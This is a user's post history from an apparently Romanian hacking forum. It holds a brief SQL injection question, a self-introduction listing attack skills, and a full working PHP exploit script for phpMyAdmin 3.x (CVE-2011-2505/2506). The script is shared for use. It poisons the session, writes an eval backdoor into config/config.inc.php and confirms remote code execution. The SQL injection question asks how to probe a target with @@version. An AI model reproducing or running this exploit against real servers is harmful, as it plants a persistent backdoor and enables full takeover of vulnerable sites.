Jump to content

xaren

Members
  • Posts

    23
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by xaren

  1. Unknown column 'rank' in 'order clause' As putea inlocui rank ala cu o cifra sau @@version sau ... ? !
  2. <?php /* # Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit # Date: 2011-07-09 # Author: Mango of ha.xxor.se # Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 # CVE : CVE-2011-2505, CVE-2011-2506 # Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt # Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html */ echo php_sapi_name()!=='cli'?'<pre>':'';?> . , )\ . . ,/) , / ) , )\ )\( /)/( (__( /( / ) __ __ ________ __ __ / \ ( )| |) \ / | |\ /| | | | | | | | (__) ( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | | | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__| ==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] Remote Code Injection [] [][] [] [] [] [] [] [] http://ha.xxor.se [][] [] [] [] [][] [][] [] [] _ _ ___ __ ____ __ ___ ___ | |-| || _ |\ /\ /| _ || ) |_|-|_||_|_|/_._\/_._\|___||_|_\ ___ ___ ___ _ _ ___ ___ __ __ ( < | [_ / /| || || )(_)| |\ | / >__)|_[_ \__\|____||_|_\|_| |_| |_| Use responsibly. <?php echo php_sapi_name()!=='cli'?'</pre>':''; if(php_sapi_name()==='cli'){ if(!isset($argv[1])){ output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2"); killme(); } $pmaurl = $argv[1]; }else{ $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:''; } $code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);'; $cookie = null; $token = null; if(!function_exists('curl_init')){ output('[!] Fatal error. Need cURL!'); killme(); } $ch = curl_init(); $debug = 0; if(php_sapi_name()!=='cli'){ ?> <form method=post> URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/> <input name=submit type=submit value=?> </form> <pre> <?php if(!isset($_REQUEST['submit']))killme(true); } output("[i] Running..."); // Start a session and get a token curl_setopt_array($ch, array( CURLOPT_URL => $pmaurl.'/setup/index.php', CURLOPT_HEADER => 1, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false )); output("[*] Contacting server to retrive session cookie and token."); $result = curl_exec($ch); if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url."); killme(); } if(!$result){ output("[!] cURL error:".curl_error($ch)); killme(); } if(false !== strpos($result, 'Cannot load or save configuration')){ output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist."); killme(); } // Extract cookie preg_match('/phpMyAdmin=([^;]+)/', $result, $matches); $cookie = $matches[1]; output("[i] Cookie:".$cookie); // Extract token preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches); $token = $matches[2]; output("[i] Token:".$token); // Poison _SESSION variable curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token); curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie); output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); // Save file curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token); output("[*] Contacting server to make it save the injected code to a file."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);'); curl_setopt($ch, CURLOPT_POST, 0); output("[*] Contacting server to test if the injected code executes."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!"); output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';"); }else{ output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable."); } curl_close($ch); function output($msg){ echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n"; flush(); } function killme(){ output("[*] Exiting..."); echo php_sapi_name()!=='cli'?'<pre>':''; die(); } echo php_sapi_name()!=='cli'?'<pre>':'';?> Nu l-am testat. Sursa : phpMyAdmin 3.x Swekey Remote Code Injection Exploit
  3. Te referi la mine ?
  4. L-am incercat acum 20 minute dar da erori de sintaxa
  5. xaren

    xaren here

    De ce imi spui xarenWo ? cine esti ? si apropo numele vechi era xareNwo nu xarenWo in fine.. sunt xaren si gata !
  6. xaren

    xaren here

    Name : Andrew Codename : xaren Age : =< 18 Location : Europe I speak : Romanian, English, Italian I like : girls, biking, programming, music, "hacking", and many others not as important as these. My Knowledges : php, sql, html, css, photoshop, illustrator, rfi, lfi, mysqli, mssqli, rce, linux, windows .. to be continued... Other : Sunt roman
×
×
  • Create New...